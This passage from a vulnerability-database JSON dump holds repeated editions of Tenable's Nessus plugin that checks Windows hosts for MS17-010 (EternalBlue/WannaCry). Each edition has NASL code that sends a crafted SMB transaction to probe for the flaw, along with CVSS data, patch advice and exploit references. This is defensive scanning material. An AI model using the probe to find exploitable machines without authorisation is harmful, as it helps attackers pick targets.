or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t 
raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! 
isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft recommends that users discontinue the use of SMBv1. SMBv1 lacks security features that were included in later SMB versions. SMBv1 can be disabled by following the vendor instructions provided in Microsoft KB2696547. Additionally, US-CERT recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices. 
For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-08-19T12:37:40", "differentElements": ["vpr"], "edition": 9}, {"bulletin": {"id": "MS17-010.NASL", "hash": "59a3f59c439bc2d52437908b8868f320", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. 
WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?8dcab5e4", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?68fc8eff", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.nessus.org/u?4c7e0cf3", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?b9d9ebf9", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?59db5b5b", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.nessus.org/u?065561d0", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.nessus.org/u?234f8ef8"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-06T03:05:32", "history": [], "viewCount": 7176, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": 
["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", 
"SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-06T03:05:32", 
"rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-10-06T03:05:32", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain 
requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # 
https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. 
For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t 
raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! 
isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft recommends that users discontinue the use of SMBv1. SMBv1 lacks security features that were included in later SMB versions. SMBv1 can be disabled by following the vendor instructions provided in Microsoft KB2696547. Additionally, US-CERT recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices. 
For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-10-06T03:05:32", "differentElements": ["vpr"], "edition": 10}, {"bulletin": {"id": "MS17-010.NASL", "hash": "c5c146b305e2f4b1abd96ec9c5d3d69f", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. 
WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?68fc8eff", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", 